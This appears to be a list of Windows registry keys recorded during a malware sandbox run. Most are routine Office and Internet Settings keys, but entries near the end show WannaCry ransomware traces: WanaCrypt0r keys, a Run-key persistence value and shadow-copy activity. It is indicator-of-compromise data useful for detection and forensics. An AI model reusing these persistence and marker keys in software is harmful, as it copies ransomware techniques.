HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SendCustomerData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\DisableFirstRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\NexusRulesEndpoint
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\NexusV3Endpoint
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesSelectionCriteriaTestId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\VersionToReport
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\PipelineServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleTimerInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleResetInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\9
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\EcsRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\ProviderId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ExecutingScenario
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\EdgeRequestPending
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Scenario\UPDATE\DisplayLevel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\AllowOnlyDNSQueryForWPAD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\InMS
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableConnectionReuse
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DocumentSyncTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WinHttpSecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableStackOverwriteProtectionExperiment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ForceDefaultAutoLogonLevelLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1A00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1A00
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\FlightNumberlines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\ConfigIds
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\FlightingVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\DeferredConfigs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\DllHost.exe
HKEY_LOCAL_MACHINE\Software\WanaCrypt0r
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\WanaCrypt0r\wd
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{ED50FC29-B964-48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Grzc\@JnanQrpelcgbe@.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBA
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\qobyhffdhzmp201
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\FlightUpdateTime
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\officeclicktorun
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\Registry Writer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\ASR Writer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\Shadow Copy Optimization Writer
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
